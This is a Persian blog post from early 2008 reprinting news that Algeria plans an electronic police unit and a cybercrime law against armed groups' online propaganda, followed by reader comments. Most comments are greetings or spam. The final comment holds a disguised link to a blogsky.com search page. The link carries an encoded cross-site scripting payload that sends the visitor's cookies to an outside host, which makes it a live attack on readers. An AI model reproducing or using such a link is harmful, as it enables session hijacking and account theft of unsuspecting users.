مبارزه با تروریستم با پلیس الکترونیکی

دولت الجزایر در نظر دارد برای مبارزه با تبلیغات تروریستی گروه‌های مسلح این کشور در اینترنت، یک گروه پلیس الکترونیکی ایجاد کند.
این گروه پلیسی بخشی از نیروهای ژاندارمی این کشور است که هم اکنون در حال آموزش هستند تا توانایی علمی و فنی مقابله با پایگاه‌های الکترونیکی که به ترویج اقدامات خشونت آمیز در این کشور می‌پردازند، به دست آورند. مطالعه در خصوص انواع و ماهیت جرایم الکترونیکی بخش دیگری از برنامه آموزشی این افراد را تشکیل می‌دهد.
مبارزه با پایگاه‌های غیر اخلاقی نیز از دیگر اهداف تشکیل این گروه اعلام شده است.
در همین حال "بوجمعه هیشور" وزیر پست، تلفن و فناوری اطلاعات الجزایر نیز از آماده شدن پیش نویس قانون مبارزه با جرایم الکترونیکی خبر داد. وی گفت: هیات دولت بزودی به بررسی این پیش نویس و تصمیم‌گیری درباره آن خواهد پرداخت.
این قانون مصادیق جرم الکترونیکی و نیز مجازات‌های آن را مشخص خواهد کرد.
منابع مطلع گفتند: پلیس ویژه مبارزه با جرایم الکترونیکی همزمان با تصویب قانون مربوطه بطور وسیع در سطح کشور وارد عمل خواهد شد تا فعالیت- های تبلیغی گروههای مسلح الجزایری را برای جذب جوانان و یا توجیه اقدامات تروریستی خود خنثی کند.
از سوی دیگر خبر می‌رسد نیروی ارتش الجزایر حدود ‪ ۲۰‬فرد مسلح را در ولایت وادی در منطقه شمال شرقی کشور را تحت تعقیب قرار داده‌اند. این افراد اواخر هفته گذشته به گروهی از مرزبانان در همین منطقه حمله و هفت تن آنان را کشتند.
گزارش دیگری نیز حاکی است که نیروهای مشترک نظامی و انتظامی الجزایر به منظور پیشگیری از هر گونه حملات انتحاری جدید، اقدامات تعقیبی و تامینی خود را علیه گروههای مسلح در نقاط مختلف کشور افزایش داده‌اند. تهدیدات تروریستی و انتحاری در الجزایر طی یکسال گذشته رو به رشد بوده‌است و در سال ‪ ۲۰۰۷‬نیز ‪ ۴۹۱‬نفر در حوادث و حملات تروریستی در این کشور کشته شده‌اند.
دولت الجزایر گروه مسلح الجزایری موسوم به "جماعت سلفی دعوت و نبرد" که از سال گذشته با اعلام پیوستن به شبکه "القاعده" نام خود را به "القاعده در مغرب اسلامی"، تغییر داد مسوول اقدامات تروریستی سالهای اخیر در این کشور می‌داند.
خشونت‌های داخلی در الجزایر در دهه سیاه (دهه ‪ ۱۹۹۰‬میلادی) بین ‪ ۱۵۰‬تا ‪ ۲۰۰‬هزار قربانی، هفت هزار مفقود، هزاران زخمی و ‪ ۳۰‬میلیارد دلار خسارت برجا گذاشت.

منبع:روزنامه هموطن سلام

نظرات 5 + ارسال نظر
نسیم پنج‌شنبه 2 اسفند‌ماه سال 1386 ساعت 08:54 ق.ظ http://ashianeh.persianblog.ir

یک همیشه یک است . شاید در تمام عمرش نتواند بیشتر از یک عدد باشد اما بعضی اوقات می تواند خیلی باشد . یک نگاه . یک سرنوشت . یک خاطره . یک دوست

کاربین یکشنبه 5 اسفند‌ماه سال 1386 ساعت 12:34 ق.ظ http://karbin.ir

وب سایت کاربین، برای برنامه نویسان امکان کاریابی به صورت پروژه ای را فراهم ساخته است، همچنین امکانات بی نظیری را برای کارفرمایان در نظر گرفته است، اگر برنامه نویس خوبی هستید و یا هر گونه پروژه ای برای انجام دارید حتما به این سایت مراجعه کنید.
http://karbin.ir

نسیم سه‌شنبه 7 اسفند‌ماه سال 1386 ساعت 10:08 ق.ظ http://ashianeh.persianblog.ir

سلام
خیلی خوشحالم که به آشیونه من قدم گذاشتید . مطالب جالبی توی وبلگتون به چشم می خوره امیدوارم همیشه موفق وپیروز باشید.

روزبه چهارشنبه 8 اسفند‌ماه سال 1386 ساعت 10:55 ب.ظ http://mob-raygan.blogfa.com/

با عرض سلام خدمت آقا محمد رضا
وبلاگ جذاب و آموزنده ای دارید
به وبلاگ ما هم سر بزن امیدوارم که بتونیم همکاری موفقیت آمیزی با همدیگر داشته باشیم
ممنون
روزبه

آقا ترورسیم اینجاست شنبه 11 اسفند‌ماه سال 1386 ساعت 07:56 ق.ظ

یه نگاه بندازید

http://blogsky.com/search.bs?q=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Frewq312.freewebhostingpro.com%2Fdocuments.php%3Fc%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E&x=73&y=14

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد